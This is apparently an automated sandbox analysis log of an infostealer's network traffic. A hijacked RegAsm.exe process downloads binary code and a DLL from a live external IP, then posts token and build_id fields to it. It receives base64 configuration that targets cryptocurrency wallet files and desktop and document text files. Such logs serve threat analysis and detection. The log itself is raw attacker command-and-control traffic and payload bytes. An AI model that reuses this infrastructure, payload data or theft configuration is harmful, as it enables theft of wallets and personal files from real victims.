                                                                              2024-05-17 16:06:35 UTC16384INData Raw: ff 83 c4 10 85 c0 0f 85 6b 03 00 00 57 e8 c4 9d ff ff 83 c4 04 ff 75 e8 53 57 e8 f7 9d ff ff 83 c4 0c ff 75 e8 8d 45 e8 50 53 57 e8 26 9e ff ff 83 c4 10 85 c0 0f 85 3c 03 00 00 8b 4d c8 83 c1 01 8b 75 e4 8b 45 dc 01 f0 3b 4d c0 0f 85 6c ff ff ff 31 f6 e9 20 03 00 00 31 f6 ff 35 30 9a 03 10 ff 15 f0 7b 03 10 83 c4 04 a1 34 9a 03 10 85 c0 74 15 6a 01 50 e8 57 4e 02 00 83 c4 08 c7 05 34 9a 03 10 00 00 00 00 a1 38 9a 03 10 85 c0 74 15 6a 01 50 e8 39 4e 02 00 83 c4 08 c7 05 38 9a 03 10 00 00 00 00 a1 3c 9a 03 10 85 c0 74 15 6a 01 50 e8 1b 4e 02 00 83 c4 08 c7 05 3c 9a 03 10 00 00 00 00 56 e8 e8 4d 02 00 83 c4 04 a3 34 9a 03 10 8b 47 38 a3 40 9a 03 10 8b 47 28 a3 44 9a 03 10 8b 47 2c a3 48 9a 03 10 8d 47 04 50 e8 bf 4d 02 00 83 c4 04 a3 38 9a 03 10 ff 75 0c e8
                                                                              Data Ascii: kWuSWuEPSW&<MuE;Ml1 150{4tjPWN48tjP9N8<tjPN<VM4G8@G(DG,HGPM8u
                                                                              2024-05-17 16:06:35 UTC16384INData Raw: 10 88 41 03 0f b6 41 04 d1 e8 8a 80 68 f9 02 10 88 41 04 0f b6 41 05 d1 e8 8a 80 68 f9 02 10 88 41 05 0f b6 41 06 d1 e8 8a 80 68 f9 02 10 88 41 06 0f b6 41 07 d1 e8 8a 80 68 f9 02 10 88 41 07 ba 01 01 01 01 8b 31 31 d6 33 51 04 b8 01 00 00 00 09 f2 0f 84 37 01 00 00 ba 1f 1f 1f 1f 33 11 be 0e 0e 0e 0e 33 71 04 09 d6 0f 84 20 01 00 00 ba e0 e0 e0 e0 33 11 be f1 f1 f1 f1 33 71 04 09 d6 0f 84 09 01 00 00 ba fe fe fe fe 8b 31 31 d6 33 51 04 09 f2 0f 84 f5 00 00 00 ba 01 fe 01 fe 8b 31 31 d6 33 51 04 09 f2 0f 84 e1 00 00 00 ba fe 01 fe 01 8b 31 31 d6 33 51 04 09 f2 0f 84 cd 00 00 00 ba 1f e0 1f e0 33 11 be 0e f1 0e f1 33 71 04 09 d6 0f 84 b6 00 00 00 ba e0 1f e0 1f 33 11 be f1 0e f1 0e 33 71 04 09 d6 0f 84 9f 00 00 00 ba 01 e0 01 e0 33 11 be 01 f1 01 f1 33 71
                                                                              Data Ascii: AAhAAhAAhAAhA113Q733q 33q113Q113Q113Q33q33q33q
                                                                              2024-05-17 16:06:35 UTC16384INData Raw: 00 e9 21 07 00 00 3d 50 06 00 00 0f 8f aa 01 00 00 3d 51 05 00 00 74 2d 3d 52 05 00 00 74 12 3d 55 05 00 00 0f 85 0a 07 00 00 c7 47 0c 01 00 00 00 83 7b 04 00 0f 84 ec 06 00 00 83 7b 08 10 0f 85 e2 06 00 00 c7 47 18 10 00 00 00 83 7c 24 24 25 0f 85 fb 07 00 00 6a 11 ff 74 24 30 e8 44 c7 00 00 83 c4 08 85 c0 0f 84 78 09 00 00 89 c7 31 c0 81 3b 51 05 00 00 0f 95 c0 ff 77 1c 8b 4d 20 51 50 ff 73 04 ff 77 18 e8 09 1e ff ff 83 c4 14 8b 4c 24 28 89 41 64 57 e8 a9 c6 00 00 83 c4 04 8b 44 24 28 83 78 64 00 0f 84 bf 08 00 00 83 7d 20 00 b9 60 2a 00 10 ba 20 2a 00 10 0f 44 d1 89 50 74 c7 80 84 00 00 00 e0 29 00 10 e9 eb 08 00 00 3d 09 21 00 00 0f 8e 1c 02 00 00 3d 0a 21 00 00 0f 84 08 02 00 00 3d 0b 21 00 00 0f 84 23 02 00 00 3d 21 40 00 00 0f 85 37 06 00 00 83 7c
                                                                              Data Ascii: !=P=Qt-=Rt=UG{{G|$$%jt$0Dx1;QwM QPswL$(AdWD$(xd} `* *DPt)=!=!=!#=!@7|
                                                                              2024-05-17 16:06:35 UTC16384INData Raw: 14 90 03 10 31 e8 89 45 f0 ff 75 08 e8 35 ab 00 00 83 c4 04 85 c0 74 5f 89 c6 8b 78 38 bb 91 00 00 00 85 ff 74 56 83 3f 03 75 51 8b 4d 18 8b 47 04 83 7d 14 00 74 59 8b 5d 0c 85 c0 74 64 89 ce 8b 4d 08 89 da 6a 03 ff 75 10 e8 47 fa ff ff 83 c4 08 89 c3 85 c0 75 24 56 ff 75 14 ff 75 08 e8 72 fd ff ff 83 c4 0c 89 c6 8b 4d f0 31 e9 e8 a3 8b 01 00 89 f0 eb 11 bb b3 00 00 00 8b 4d f0 31 e9 e8 90 8b 01 00 89 d8 83 c4 10 5e 5f 5b 5d c3 85 c0 74 06 83 7f 68 00 74 5a 81 c7 90 00 00 00 eb 55 8b 01 89 45 e8 8b 47 64 89 45 e4 8b 4f 74 ff 15 00 a0 03 10 8d 45 ec ff 75 10 53 ff 75 e8 50 ff 75 14 ff 75 e4 ff d1 83 c4 18 85 c0 74 32 e8 a1 8d 01 00 50 e8 eb 84 00 00 83 c4 04 8b 55 ec 8b 4d 18 89 11 bb 50 01 00 00 3d 50 01 00 00 74 8a eb 18 83 c7 60 8b 07 89 01 31 db e9 7a
                                                                              Data Ascii: 1Eu5t_x8tV?uQMG}tY]tdMjuGu$VuurM1M1^_[]thtZUEGdEOtEuSuPuut2PUMP=Pt`1z
                                                                              2024-05-17 16:06:35 UTC16384INData Raw: d8 00 00 00 00 c7 45 d4 04 00 00 00 eb 18 0f 1f 84 00 00 00 00 00 8b 47 fc 8b 00 89 45 d8 83 c7 0c 83 c6 ff 74 5a 8b 47 f8 85 c0 74 19 3d 61 01 00 00 74 e2 8b 4f fc eb 15 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 00 8b 4f fc 8b 11 89 55 d4 ff 37 51 50 ff 75 dc e8 8c 53 00 00 83 c4 10 85 c0 74 bd 89 c3 e9 80 01 00 00 bf 02 00 00 00 e9 83 01 00 00 c7 45 d4 04 00 00 00 c7 45 d8 00 00 00 00 8b 45 10 8b 4d 0c 83 ec 1c 0f 28 05 40 fb 02 10 0f 11 44 24 0c 89 44 24 08 89 4c 24 04 8b 45 08 89 04 24 e8 fe 7c ff ff 83 c4 1c 85 c0 74 0c 89 c3 ff 75 dc e8 7d 5a 00 00 eb 3d 8b 7d 18 8b 5d 14 57 e8 8b 4d 01 00 83 c4 04 89 c6 89 7d ec 8d 45 ec 50 56 57 53 ff 75 08 e8 e8 9a ff ff 83 c4 14 85 c0 74 26 89 c3 ff 75 dc e8 47 5a 00 00 83 c4 04 56 e8 78 4d 01 00 83 c4 04 83 fb 40 bf
                                                                              Data Ascii: EGEtZGt=atOf.OU7QPuStEEEM(@D$D$L$E$|tu}Z=}]WM}EPVWSut&uGZVxM@
                                                                              2024-05-17 16:06:35 UTC16384INData Raw: 8b 48 38 b8 91 00 00 00 85 c9 74 4a 83 39 02 75 45 83 79 04 00 74 3f 8b 55 0c 8b 59 6c 83 c3 08 89 1f 31 c0 85 d2 74 2e b8 50 01 00 00 39 de 72 25 8b 01 89 02 8b 41 70 89 42 04 83 c2 08 ff 71 6c ff 71 64 52 e8 cc 0f 01 00 83 c4 0c 31 c0 eb 05 b8 b3 00 00 00 5e 5f 5b 5d c3 cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 83 ec 10 8b 7d 10 a1 14 90 03 10 31 e8 89 45 f0 85 ff 0f 84 2d 01 00 00 8b 5d 0c 8b 33 ff 75 08 e8 b5 2a 00 00 83 c4 04 b9 b3 00 00 00 85 c0 0f 84 12 01 00 00 83 fe 0a 0f 87 f7 00 00 00 b9 78 06 00 00 0f a3 f1 73 12 8d 48 38 eb 1a 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 00 b9 83 01 00 00 0f a3 f1 73 e4 8d 48 34 8b 09 83 fe 0a 77 2f ba 78 06 00 00 0f a3 f2 73 12 83 c0 38 eb 1a 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 00 ba 83 01 00 00 0f a3 f2 73
                                                                              Data Ascii: H8tJ9uEyt?UYl1t.P9r%ApBqlqdR1^_[]USWV}1E-]3u*xsH8f.sH4w/xs8f.s
                                                                              2024-05-17 16:06:35 UTC16384INData Raw: cc cc cc cc cc cc 55 89 e5 53 57 56 ff 75 08 e8 c2 d8 ff ff 83 c4 04 85 c0 0f 84 9c 03 00 00 89 c6 c7 40 24 00 00 00 00 bf 02 00 00 00 83 78 0c 00 0f 88 54 03 00 00 ff 76 34 ff 15 f0 7b 03 10 83 c4 04 8b 46 34 8b 5e 40 8d 4b 01 89 4e 40 50 ff 15 10 7c 03 10 83 c4 04 83 fb 2c 0f 8f 29 03 00 00 6b c3 54 8d 0c 06 83 c1 64 89 4c 06 5c c7 44 06 64 57 43 53 ce c7 44 06 60 04 00 00 00 c7 44 06 58 00 00 00 00 c7 44 06 54 00 00 00 00 0f 57 c0 0f 11 44 06 44 83 7e 0c 00 0f 88 ea 02 00 00 8d 1c 06 83 c3 44 ff 76 34 ff 15 f0 7b 03 10 83 c4 04 69 4b 10 c5 90 c6 6a 8b 86 0c 0f 00 00 83 c0 ff 21 c8 8b 8c 86 10 0f 00 00 89 0b c7 43 04 00 00 00 00 8b 8c 86 10 0f 00 00 85 c9 74 03 89 59 04 89 9c 86 10 0f 00 00 ff 76 34 ff 15 10 7c 03 10 83 c4 04 83 7e 0c 00 0f 88 8b 02 00
                                                                              Data Ascii: USWVu@$xTv4{F4^@KN@P|,)kTdL\DdWCSD`DXDTWDD~Dv4{iKj!CtYv4|~
                                                                              2024-05-17 16:06:35 UTC16384INData Raw: 00 89 f8 81 c4 3c 01 00 00 5e 5f 5b 5d c3 cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 89 d6 89 cf 8b 5d 08 8b 4b 24 ff 15 00 a0 03 10 ff 75 14 ff 75 10 ff 75 0c 53 ff d1 83 c4 10 85 c0 75 1e 31 c0 39 5e 34 0f 94 c0 89 f9 89 f2 ff 75 14 ff 75 10 ff 75 0c 50 e8 1c 2b 00 00 83 c4 10 5e 5f 5b 5d c3 cc cc cc cc 55 89 e5 53 57 56 83 ec 10 8b 45 08 8b 0d 14 90 03 10 31 e9 89 4d f0 c7 45 ec 00 00 00 00 85 c0 74 63 8b 75 10 8b 58 34 85 db 74 5d 85 f6 74 5f 8b 4d 0c 8d 45 e8 8d 7d ec 89 f2 50 57 e8 8e 00 00 00 83 c4 08 85 c0 74 60 89 c7 8b 45 ec 89 45 e4 8b 4b 14 ff 15 00 a0 03 10 ff 75 14 56 57 53 8b 5d e4 ff d1 83 c4 10 89 c6 85 db 74 40 57 e8 96 8d 00 00 83 c4 04 ff 75 e8 53 e8 b4 8d 00 00 83 c4 08 eb 29 31 f6 eb 25 8b 18 85 f6 75 a1 8b 4b 14 ff 15 00 a0 03 10 ff
                                                                              Data Ascii: <^_[]USWV]K$uuuSu19^4uuuP+^_[]USWVE1MEtcuX4t]t_ME}PWt`EEKuVWS]t@WuS)1%uK


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              16192.168.2.54972595.217.240.1014431600C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-05-17 16:06:37 UTC225OUTGET /vcruntime140.dll HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1
                                                                              Host: 95.217.240.101
                                                                              Cache-Control: no-cache
                                                                              2024-05-17 16:06:38 UTC245INHTTP/1.1 200 OK
                                                                              Server: nginx
                                                                              Date: Fri, 17 May 2024 16:06:37 GMT
                                                                              Content-Type: application/octet-stream
                                                                              Content-Length: 80880
                                                                              Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
                                                                              Connection: close
                                                                              ETag: "6315a9f4-13bf0"
                                                                              Accept-Ranges: bytes
                                                                              2024-05-17 16:06:38 UTC16139INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22
                                                                              Data Ascii: MZ@!L!This program cannot be run in DOS mode.$08euRichPEL|0]"
                                                                              2024-05-17 16:06:38 UTC16384INData Raw: ff ff eb 1e 0f b6 4e 03 0f b6 42 03 2b c8 74 12 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff eb 02 33 c9 85 c9 0f 85 6f 05 00 00 8b 46 04 3b 42 04 74 4f 0f b6 f8 0f b6 42 04 2b f8 75 18 0f b6 7e 05 0f b6 42 05 2b f8 75 0c 0f b6 7e 06 0f b6 42 06 2b f8 74 10 33 c9 85 ff 0f 9f c1 8d 0c 4d ff ff ff ff eb 1e 0f b6 4e 07 0f b6 42 07 2b c8 74 12 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff eb 02 33 c9 85 c9 0f 85 0e 05 00 00 8b 46 08 3b 42 08 74 4f 0f b6 f8 0f b6 42 08 2b f8 75 18 0f b6 7e 09 0f b6 42 09 2b f8 75 0c 0f b6 7e 0a 0f b6 42 0a 2b f8 74 10 33 c9 85 ff 0f 9f c1 8d 0c 4d ff ff ff ff eb 1e 0f b6 4e 0b 0f b6 42 0b 2b c8 74 12 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff eb 02 33 c9 85 c9 0f 85 ad 04 00 00 8b 46 0c 3b 42 0c 74 4f 0f b6 f8 0f b6 42 0c 2b f8 75 18
                                                                              Data Ascii: NB+t3E3oF;BtOB+u~B+u~B+t3MNB+t3E3F;BtOB+u~B+u~B+t3MNB+t3E3F;BtOB+u
                                                                              2024-05-17 16:06:38 UTC16384INData Raw: 08 00 00 59 6a 28 8d 4d 80 8b f0 e8 67 f3 ff ff 56 8d 4d f0 51 8b c8 e8 0a f7 ff ff 6a 29 8d 85 70 ff ff ff 50 8d 4d f0 e8 1b f7 ff ff 50 8d 4d f8 e8 78 f7 ff ff 81 7d dc 00 08 00 00 75 1a 8b c3 25 00 07 00 00 3d 00 02 00 00 74 0c 8d 45 98 50 8d 4d f8 e8 55 f7 ff ff a1 98 f2 00 10 c1 e8 13 f7 d0 a8 01 8d 45 cc 50 74 11 e8 92 2e 00 00 59 50 8d 4d f8 e8 34 f7 ff ff eb 0f e8 81 2e 00 00 59 50 8d 4d f8 e8 9f f8 ff ff 8d 45 cc 50 e8 69 23 00 00 59 50 8d 4d f8 e8 10 f7 ff ff a1 98 f2 00 10 c1 e8 08 f7 d0 a8 01 8d 45 cc 50 74 11 e8 30 3e 00 00 59 50 8d 4d f8 e8 ef f6 ff ff eb 0f e8 1f 3e 00 00 59 50 8d 4d f8 e8 5a f8 ff ff 8d 45 cc 50 e8 6a 19 00 00 59 50 8d 4d f8 e8 47 f8 ff ff a1 98 f2 00 10 c1 e8 02 f7 d0 a8 01 74 20 85 ff 74 1c 8b 45 f8 89 07 8b 45 fc 89 47
                                                                              Data Ascii: Yj(MgVMQj)pPMPMx}u%=tEPMUEPt.YPM4.YPMEPi#YPMEPt0>YPM>YPMZEPjYPMGt tEEG
                                                                              2024-05-17 16:06:38 UTC16384INData Raw: 0f 83 fa 10 74 15 b8 ff ff 00 00 e9 f7 01 00 00 81 c9 80 00 00 00 eb 03 83 c9 40 83 e0 06 2b c7 0f 84 df 01 00 00 2b c6 74 1e 2b c6 74 0f 2b c6 75 d4 81 c9 00 04 00 00 e9 c8 01 00 00 81 c9 00 01 00 00 e9 bd 01 00 00 81 c9 00 02 00 00 e9 b2 01 00 00 2b c6 75 af 8d 51 01 89 15 90 f2 00 10 8a 02 3c 30 7c 2a 3c 39 7f 26 0f be c0 83 c2 d1 03 c2 a3 90 f2 00 10 e8 8c fe ff ff 0d 00 00 01 00 e9 81 01 00 00 b8 fe ff 00 00 e9 77 01 00 00 b9 ff ff 00 00 e9 dc 00 00 00 83 f8 2f 0f 8e 63 ff ff ff 8b f2 83 f8 35 7e 62 83 f8 41 0f 85 53 ff ff ff 81 c9 00 90 00 00 e9 b8 00 00 00 b9 fe ff 00 00 4a e9 ad 00 00 00 81 c9 00 98 00 00 e9 a2 00 00 00 83 e8 43 0f 84 94 00 00 00 83 e8 01 0f 84 83 00 00 00 83 e8 01 74 76 83 e8 0d 0f 85 12 ff ff ff 42 89 15 90 f2 00 10 8b f2 8a 0a
                                                                              Data Ascii: t@++t+t+u+uQ<0|*<9&w/c5~bASJCtvB
                                                                              2024-05-17 16:06:38 UTC15589INData Raw: ae e8 7c cd cc c1 be ea d2 ff 35 4e c0 ce b5 7a ad bb a6 bb 2e dc 94 e9 f3 1e 7d e0 ec 28 a3 07 82 66 5a c3 5b 5a cb ec 03 c9 e3 2c 94 15 21 2b a0 f9 d9 9b 4b e7 b6 de eb 20 51 8c 3e fa 2c 23 d5 18 b0 f0 b1 a0 70 6c 7a ef 8b 83 48 a6 3a 02 06 ef a0 8a 2c b7 88 45 30 82 05 ff 30 82 03 e7 a0 03 02 01 02 02 13 33 00 00 01 51 9e 8d 8f 40 71 a3 0e 41 00 00 00 00 01 51 30 0d 06 09 2a 86 48 86 f7 0d 01 01 0b 05 00 30 7e 31 0b 30 09 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 28 30 26 06 03 55 04 03 13 1f 4d 69 63 72 6f 73 6f 66 74 20 43 6f 64 65 20 53 69 67 6e 69 6e
                                                                              Data Ascii: |5Nz.}(fZ[Z,!+K Q>,#plzH:,E003Q@qAQ0*H0~10UUS10UWashington10URedmond10UMicrosoft Corporation1(0&UMicrosoft Code Signin


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              17192.168.2.54972695.217.240.1014431600C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-05-17 16:06:40 UTC326OUTPOST / HTTP/1.1
                                                                              Content-Type: multipart/form-data; boundary=----KFIDAFBFBKFHJJKEHIEG
                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1
                                                                              Host: 95.217.240.101
                                                                              Content-Length: 1145
                                                                              Connection: Keep-Alive
                                                                              Cache-Control: no-cache
                                                                              2024-05-17 16:06:40 UTC1145OUTData Raw: 2d 2d 2d 2d 2d 2d 4b 46 49 44 41 46 42 46 42 4b 46 48 4a 4a 4b 45 48 49 45 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 34 64 65 62 37 38 32 34 36 63 30 31 30 39 39 34 64 31 33 32 36 63 34 62 38 64 34 39 34 32 62 32 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 49 44 41 46 42 46 42 4b 46 48 4a 4a 4b 45 48 49 45 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 39 65 64 32 38 37 34 36 39 63 33 37 32 31 66 64 35 63 61 66 33 34 36 35 38 30 62 32 63 66 30 64 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 49 44 41 46 42 46 42 4b 46 48 4a 4a 4b 45 48 49 45 47 0d 0a 43 6f 6e 74
                                                                              Data Ascii: ------KFIDAFBFBKFHJJKEHIEGContent-Disposition: form-data; name="token"4deb78246c010994d1326c4b8d4942b2------KFIDAFBFBKFHJJKEHIEGContent-Disposition: form-data; name="build_id"9ed287469c3721fd5caf346580b2cf0d------KFIDAFBFBKFHJJKEHIEGCont
                                                                              2024-05-17 16:06:42 UTC158INHTTP/1.1 200 OK
                                                                              Server: nginx
                                                                              Date: Fri, 17 May 2024 16:06:41 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              2024-05-17 16:06:42 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: 2ok0


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              18192.168.2.54972795.217.240.1014431600C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-05-17 16:06:42 UTC325OUTPOST / HTTP/1.1
                                                                              Content-Type: multipart/form-data; boundary=----GCGDGHCBGDHJJKECAECB
                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1
                                                                              Host: 95.217.240.101
                                                                              Content-Length: 331
                                                                              Connection: Keep-Alive
                                                                              Cache-Control: no-cache
                                                                              2024-05-17 16:06:42 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 47 43 47 44 47 48 43 42 47 44 48 4a 4a 4b 45 43 41 45 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 34 64 65 62 37 38 32 34 36 63 30 31 30 39 39 34 64 31 33 32 36 63 34 62 38 64 34 39 34 32 62 32 0d 0a 2d 2d 2d 2d 2d 2d 47 43 47 44 47 48 43 42 47 44 48 4a 4a 4b 45 43 41 45 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 39 65 64 32 38 37 34 36 39 63 33 37 32 31 66 64 35 63 61 66 33 34 36 35 38 30 62 32 63 66 30 64 0d 0a 2d 2d 2d 2d 2d 2d 47 43 47 44 47 48 43 42 47 44 48 4a 4a 4b 45 43 41 45 43 42 0d 0a 43 6f 6e 74
                                                                              Data Ascii: ------GCGDGHCBGDHJJKECAECBContent-Disposition: form-data; name="token"4deb78246c010994d1326c4b8d4942b2------GCGDGHCBGDHJJKECAECBContent-Disposition: form-data; name="build_id"9ed287469c3721fd5caf346580b2cf0d------GCGDGHCBGDHJJKECAECBCont
                                                                              2024-05-17 16:06:43 UTC158INHTTP/1.1 200 OK
                                                                              Server: nginx
                                                                              Date: Fri, 17 May 2024 16:06:42 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              2024-05-17 16:06:43 UTC2228INData Raw: 38 61 38 0d 0a 51 6d 6c 30 59 32 39 70 62 69 42 44 62 33 4a 6c 66 44 46 38 58 45 4a 70 64 47 4e 76 61 57 35 63 64 32 46 73 62 47 56 30 63 31 78 38 64 32 46 73 62 47 56 30 4c 6d 52 68 64 48 77 78 66 45 4a 70 64 47 4e 76 61 57 34 67 51 32 39 79 5a 53 42 50 62 47 52 38 4d 58 78 63 51 6d 6c 30 59 32 39 70 62 6c 78 38 4b 6e 64 68 62 47 78 6c 64 43 6f 75 5a 47 46 30 66 44 42 38 52 47 39 6e 5a 57 4e 76 61 57 35 38 4d 58 78 63 52 47 39 6e 5a 57 4e 76 61 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 46 4a 68 64 6d 56 75 49 45 4e 76 63 6d 56 38 4d 58 78 63 55 6d 46 32 5a 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 45 52 68 5a 57 52 68 62 48 56 7a 49 45 31 68 61 57 35 75 5a 58 52 38 4d 58 78 63 52 47 46 6c 5a 47
                                                                              Data Ascii: 8a8Qml0Y29pbiBDb3JlfDF8XEJpdGNvaW5cd2FsbGV0c1x8d2FsbGV0LmRhdHwxfEJpdGNvaW4gQ29yZSBPbGR8MXxcQml0Y29pblx8KndhbGxldCouZGF0fDB8RG9nZWNvaW58MXxcRG9nZWNvaW5cfCp3YWxsZXQqLmRhdHwwfFJhdmVuIENvcmV8MXxcUmF2ZW5cfCp3YWxsZXQqLmRhdHwwfERhZWRhbHVzIE1haW5uZXR8MXxcRGFlZG


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              19192.168.2.54972895.217.240.1014431600C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-05-17 16:06:44 UTC325OUTPOST / HTTP/1.1
                                                                              Content-Type: multipart/form-data; boundary=----AFCAAEGDBKJJKECBKFHC
                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1
                                                                              Host: 95.217.240.101
                                                                              Content-Length: 331
                                                                              Connection: Keep-Alive
                                                                              Cache-Control: no-cache
                                                                              2024-05-17 16:06:44 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 41 46 43 41 41 45 47 44 42 4b 4a 4a 4b 45 43 42 4b 46 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 34 64 65 62 37 38 32 34 36 63 30 31 30 39 39 34 64 31 33 32 36 63 34 62 38 64 34 39 34 32 62 32 0d 0a 2d 2d 2d 2d 2d 2d 41 46 43 41 41 45 47 44 42 4b 4a 4a 4b 45 43 42 4b 46 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 39 65 64 32 38 37 34 36 39 63 33 37 32 31 66 64 35 63 61 66 33 34 36 35 38 30 62 32 63 66 30 64 0d 0a 2d 2d 2d 2d 2d 2d 41 46 43 41 41 45 47 44 42 4b 4a 4a 4b 45 43 42 4b 46 48 43 0d 0a 43 6f 6e 74
                                                                              Data Ascii: ------AFCAAEGDBKJJKECBKFHCContent-Disposition: form-data; name="token"4deb78246c010994d1326c4b8d4942b2------AFCAAEGDBKJJKECBKFHCContent-Disposition: form-data; name="build_id"9ed287469c3721fd5caf346580b2cf0d------AFCAAEGDBKJJKECBKFHCCont
                                                                              2024-05-17 16:06:45 UTC158INHTTP/1.1 200 OK
                                                                              Server: nginx
                                                                              Date: Fri, 17 May 2024 16:06:45 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              2024-05-17 16:06:45 UTC131INData Raw: 37 38 0d 0a 52 47 56 6d 59 58 56 73 64 48 77 6c 52 45 39 44 56 55 31 46 54 6c 52 54 4a 56 78 38 4b 69 35 30 65 48 52 38 4e 54 42 38 64 48 4a 31 5a 58 77 71 64 32 6c 75 5a 47 39 33 63 79 70 38 5a 47 56 7a 61 33 52 76 63 48 77 6c 52 45 56 54 53 31 52 50 55 43 56 63 66 43 6f 75 64 48 68 30 66 44 55 77 66 47 5a 68 62 48 4e 6c 66 43 70 33 61 57 35 6b 62 33 64 7a 4b 6e 77 3d 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: 78RGVmYXVsdHwlRE9DVU1FTlRTJVx8Ki50eHR8NTB8dHJ1ZXwqd2luZG93cyp8ZGVza3RvcHwlREVTS1RPUCVcfCoudHh0fDUwfGZhbHNlfCp3aW5kb3dzKnw=0


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              20192.168.2.54972995.217.240.1014431600C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                              TimestampBytes transferredDirectionData
